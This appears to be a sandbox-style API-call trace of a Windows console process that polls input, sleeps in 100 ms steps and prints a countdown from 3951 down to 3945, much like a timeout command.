[0134.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083951", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0134.326] GetConsoleOutputCP () returned 0x1b5
[0134.326] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083951", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083951", lpUsedDefaultChar=0x0) returned 8
[0134.326] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0134.326] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0134.326] Sleep (dwMilliseconds=0x64)
[0134.434] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.435] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.435] Sleep (dwMilliseconds=0x64)
[0134.543] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.544] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.544] Sleep (dwMilliseconds=0x64)
[0134.653] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.653] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.653] Sleep (dwMilliseconds=0x64)
[0134.762] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.762] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.762] Sleep (dwMilliseconds=0x64)
[0134.871] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.871] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.871] Sleep (dwMilliseconds=0x64)
[0134.990] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.990] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.990] Sleep (dwMilliseconds=0x64)
[0135.089] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.090] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0135.090] Sleep (dwMilliseconds=0x64)
[0135.199] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.199] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0135.199] Sleep (dwMilliseconds=0x64)
[0135.308] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.308] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.308] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083950") returned 8
[0135.308] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0135.308] __iob_func () returned 0x757a2900
[0135.308] _fileno (_File=0x757a2920) returned 1
[0135.309] _errno () returned 0x5507d8
[0135.309] _get_osfhandle (_FileHandle=1) returned 0x4c
[0135.309] _errno () returned 0x5507d8
[0135.309] GetFileType (hFile=0x4c) returned 0x2
[0135.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0135.309] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0135.309] lstrlenW (lpString="\x08\x08\x08\x083950") returned 8
[0135.309] GetConsoleOutputCP () returned 0x1b5
[0135.309] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083950", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0135.309] GetConsoleOutputCP () returned 0x1b5
[0135.309] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083950", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083950", lpUsedDefaultChar=0x0) returned 8
[0135.309] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0135.309] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0135.309] Sleep (dwMilliseconds=0x64)
[0135.417] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.417] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.417] Sleep (dwMilliseconds=0x64)
[0135.526] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.526] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.526] Sleep (dwMilliseconds=0x64)
[0135.635] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.636] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.636] Sleep (dwMilliseconds=0x64)
[0135.745] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.745] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.745] Sleep (dwMilliseconds=0x64)
[0135.854] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.854] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.854] Sleep (dwMilliseconds=0x64)
[0135.963] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0135.963] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0135.963] Sleep (dwMilliseconds=0x64)
[0136.072] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.072] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0136.072] Sleep (dwMilliseconds=0x64)
[0136.181] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.181] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe3
[0136.181] Sleep (dwMilliseconds=0x64)
[0136.290] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.291] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.291] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083949") returned 8
[0136.291] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0136.291] __iob_func () returned 0x757a2900
[0136.291] _fileno (_File=0x757a2920) returned 1
[0136.291] _errno () returned 0x5507d8
[0136.291] _get_osfhandle (_FileHandle=1) returned 0x4c
[0136.291] _errno () returned 0x5507d8
[0136.291] GetFileType (hFile=0x4c) returned 0x2
[0136.291] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0136.291] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0136.291] lstrlenW (lpString="\x08\x08\x08\x083949") returned 8
[0136.291] GetConsoleOutputCP () returned 0x1b5
[0136.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083949", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0136.291] GetConsoleOutputCP () returned 0x1b5
[0136.291] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083949", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083949", lpUsedDefaultChar=0x0) returned 8
[0136.291] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0136.292] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0136.292] Sleep (dwMilliseconds=0x64)
[0136.400] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.400] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.400] Sleep (dwMilliseconds=0x64)
[0136.509] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.509] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.509] Sleep (dwMilliseconds=0x64)
[0136.618] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.618] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.618] Sleep (dwMilliseconds=0x64)
[0136.737] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.737] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.737] Sleep (dwMilliseconds=0x64)
[0136.836] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.837] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.837] Sleep (dwMilliseconds=0x64)
[0136.946] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0136.946] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0136.946] Sleep (dwMilliseconds=0x64)
[0137.056] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.056] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0137.056] Sleep (dwMilliseconds=0x64)
[0137.164] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.164] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe4
[0137.164] Sleep (dwMilliseconds=0x64)
[0137.282] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.282] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe5
[0137.282] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083948") returned 8
[0137.282] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0137.282] __iob_func () returned 0x757a2900
[0137.282] _fileno (_File=0x757a2920) returned 1
[0137.282] _errno () returned 0x5507d8
[0137.282] _get_osfhandle (_FileHandle=1) returned 0x4c
[0137.282] _errno () returned 0x5507d8
[0137.282] GetFileType (hFile=0x4c) returned 0x2
[0137.282] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0137.282] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0137.282] lstrlenW (lpString="\x08\x08\x08\x083948") returned 8
[0137.282] GetConsoleOutputCP () returned 0x1b5
[0137.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083948", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0137.283] GetConsoleOutputCP () returned 0x1b5
[0137.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083948", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083948", lpUsedDefaultChar=0x0) returned 8
[0137.283] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0137.283] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0137.283] Sleep (dwMilliseconds=0x64)
[0137.414] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.414] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe5
[0137.414] Sleep (dwMilliseconds=0x64)
[0137.554] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.554] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe5
[0137.554] Sleep (dwMilliseconds=0x64)
[0137.757] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.757] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe5
[0137.757] Sleep (dwMilliseconds=0x64)
[0137.886] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0137.886] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe5
[0137.886] Sleep (dwMilliseconds=0x64)
[0138.054] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0138.054] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe5
[0138.054] Sleep (dwMilliseconds=0x64)
[0138.240] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0138.241] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe6
[0138.241] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083947") returned 8
[0138.241] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0138.241] __iob_func () returned 0x757a2900
[0138.241] _fileno (_File=0x757a2920) returned 1
[0138.241] _errno () returned 0x5507d8
[0138.241] _get_osfhandle (_FileHandle=1) returned 0x4c
[0138.241] _errno () returned 0x5507d8
[0138.241] GetFileType (hFile=0x4c) returned 0x2
[0138.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0138.241] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0138.241] lstrlenW (lpString="\x08\x08\x08\x083947") returned 8
[0138.241] GetConsoleOutputCP () returned 0x1b5
[0138.241] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083947", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0138.241] GetConsoleOutputCP () returned 0x1b5
[0138.242] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083947", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083947", lpUsedDefaultChar=0x0) returned 8
[0138.242] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0138.242] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0138.242] Sleep (dwMilliseconds=0x64)
[0138.430] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0138.430] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe6
[0138.430] Sleep (dwMilliseconds=0x64)
[0138.615] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0138.615] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe6
[0138.615] Sleep (dwMilliseconds=0x64)
[0138.802] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0138.802] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe6
[0138.802] Sleep (dwMilliseconds=0x64)
[0138.974] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0138.974] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe6
[0138.974] Sleep (dwMilliseconds=0x64)
[0139.145] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0139.146] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe6
[0139.146] Sleep (dwMilliseconds=0x64)
[0139.332] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0139.333] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe7
[0139.333] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083946") returned 8
[0139.333] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0139.333] __iob_func () returned 0x757a2900
[0139.333] _fileno (_File=0x757a2920) returned 1
[0139.333] _errno () returned 0x5507d8
[0139.333] _get_osfhandle (_FileHandle=1) returned 0x4c
[0139.333] _errno () returned 0x5507d8
[0139.333] GetFileType (hFile=0x4c) returned 0x2
[0139.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0139.333] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0139.333] lstrlenW (lpString="\x08\x08\x08\x083946") returned 8
[0139.333] GetConsoleOutputCP () returned 0x1b5
[0139.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083946", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0139.333] GetConsoleOutputCP () returned 0x1b5
[0139.334] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083946", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083946", lpUsedDefaultChar=0x0) returned 8
[0139.334] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0139.334] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0139.334] Sleep (dwMilliseconds=0x64)
[0139.520] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0139.520] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe7
[0139.520] Sleep (dwMilliseconds=0x64)
[0139.692] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0139.692] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe7
[0139.692] Sleep (dwMilliseconds=0x64)
[0139.863] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0139.863] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe7
[0139.863] Sleep (dwMilliseconds=0x64)
[0140.050] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0140.050] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe7
[0140.050] Sleep (dwMilliseconds=0x64)
[0140.237] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0140.237] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0140.237] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083945") returned 8
[0140.238] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0140.238] __iob_func () returned 0x757a2900
[0140.238] _fileno (_File=0x757a2920) returned 1
[0140.238] _errno () returned 0x5507d8
[0140.238] _get_osfhandle (_FileHandle=1) returned 0x4c
[0140.238] _errno () returned 0x5507d8
[0140.238] GetFileType (hFile=0x4c) returned 0x2
[0140.238] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0140.238] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0140.238] lstrlenW (lpString="\x08\x08\x08\x083945") returned 8
[0140.238] GetConsoleOutputCP () returned 0x1b5
[0140.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083945", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0140.238] GetConsoleOutputCP () returned 0x1b5
[0140.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083945", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083945", lpUsedDefaultChar=0x0) returned 8
[0140.238] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0140.238] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0140.238] Sleep (dwMilliseconds=0x64)
[0140.409] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0140.409] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0140.409] Sleep (dwMilliseconds=0x64)
[0140.565] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0140.565] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0140.565] Sleep (dwMilliseconds=0x64)
[0140.675] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0140.675] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe8
[0140.675] Sleep (dwMilliseconds=0x64)
[0140.814] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
